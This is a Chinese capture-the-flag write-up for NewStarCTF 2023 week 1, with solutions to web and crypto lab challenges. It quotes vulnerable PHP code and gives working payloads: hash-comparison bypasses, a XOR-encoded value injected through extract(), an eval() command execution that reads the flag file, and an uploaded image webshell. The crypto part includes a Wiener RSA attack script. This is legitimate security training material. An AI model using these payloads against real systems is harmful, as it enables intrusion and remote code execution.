NewStarCTF 2023 week1 wp

web

泄漏的秘密

丁真robots.txt www.zip

Begin of PHP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}


get:?key1[]=1&key2[]=2&key4[]=4&key5=2024a
post:key3[]=3&flag5=("%08%09%08%05"^"%7c%7b%7d%60") 异或构造true

R!C!E!

1
2
3
4
5
6
7
8
9
10
11
<?php
highlight_file(__FILE__);
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
    $password=md5($_POST['password']);
    $code=$_POST['e_v.a.l'];
    if(substr($password,0,6)==="c4d038"){
        if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
            eval($code);
        }
    }
}
1
2
3
4
5
6
7
8
9
import hashlib
for i in range(999999999999999):
    x=hashlib.md5()
    x.update(str(i).encode('utf-8'))
    des=x.hexdigest()
    if des[0:6]=='c4d038':
        print(i)
        break
#114514

password=114514&e[v.a.l=var_dump(scandir('/')); –> flag
password=114514&e[v.a.l=var_dump(exec('tac /fl?g'));

EasyLogin


抓包发现密码为md5形式的
先尝试数字弱密码, 6-18位数字

密码就是000000……
重新登录抓包

放包然后再抓包[http://node4.buuoj.cn:26958](http://node4.buuoj.cn:26958)/passport/2c702a27a0f27a5c60daf3887be50e515801b211c9d8418ee4d792ce8d924897.php

ErrorFlask

/?number1=a&number2=a报错直接找flag

Begin of HTTP


Begin of Upload

上传图片🐎抓包改后缀php rce

crypto

babyxor

1
2
3
4
5
6
7
8
9
from secret import *

ciphertext = []

for f in flag:
    ciphertext.append(f ^ key)

print(bytes(ciphertext).hex())
# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2

先推key

1
2
3
4
5
6
7
8
9
# print(ord('f')^int('e9',16))   143
# print(ord('l')^int('e3',16))   143

key=143

a='e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
for i in range(0,len(a),2):
  print(chr(int(a[i:i+2],16)^key),end='')
#flag{x0r_15_symm3try_and_e4zy!!!!!!}

Vigenère


babyencoding

1
2
3
part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=        base64
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=       base32
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`              uudecode

Small d

维纳攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import gmpy2
import libnum

def continuedFra(x, y):

    cf = []
    while y:
        cf.append(x // y)
        x, y = y, x % y
    return cf

def gradualFra(cf):
    numerator = 0
    denominator = 1
    for x in cf[::-1]:
        # 这里的渐进分数分子分母要分开
        numerator, denominator = denominator, x * denominator + numerator
    return numerator, denominator

def solve_pq(a, b, c):
    par = gmpy2.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)
    
def getGradualFra(cf):
    gf = []
    for i in range(1, len(cf) + 1):
        gf.append(gradualFra(cf[:i]))
    return gf

def wienerAttack(e, n):
    cf = continuedFra(e, n)
    gf = getGradualFra(cf)
    for d, k in gf:
        if k == 0: continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d

n = 
e = 
c = 
d = wienerAttack(e, n)
m = pow(c, d, n)
print(libnum.n2s(m))

babyrsa

n分解多个因数

yafu分解 

1
2
3
4
p_list = []
phi= 1
for p in p_list:
    phi *= (p-1)

循环求欧拉函数就行

fence

Caesar’s Secert

brainfuck

Affine

1
2
3
4
5
6
7
8
9
10
11
12
from flag import flag, key

modulus = 256

ciphertext = []

for f in flag:
    ciphertext.append((key[0]*f + key[1]) % modulus)          # 

print(bytes(ciphertext).hex())

# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064

仿射密码五个字符
思路是复用加密,利用flag{爆破出 key[0] 和 key[1]
然后利用解密函数解密

1
2
3
4
5
6
7
8
9
10
for a in range(-200,200):
    for b in range (-200,200):
        if (a*ord('f')+b)%256 == int('dd',16) and (a*ord('l')+b)%256 == int('43',16) and (a*ord('a')+b)%256 == int('88',16) and (a*ord('g')+b)%256 == int('ee',16):
            print(a,b)

a='dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064'
for i in range(0,len(a),2):
   print(chr(241*(int(a[i:i+2],16)-23)%256),end='')
#17 23
#flag{4ff1ne_c1pher_i5_very_3azy}
CTF > Write Up
#Write Up
NewStarCTF 2023 week1 wp
http://example.com/2023/10/04/NewStarCTF 2023 week1/
作者
J_0k3r
发布于
2023年10月4日
许可协议
BY J_0K3R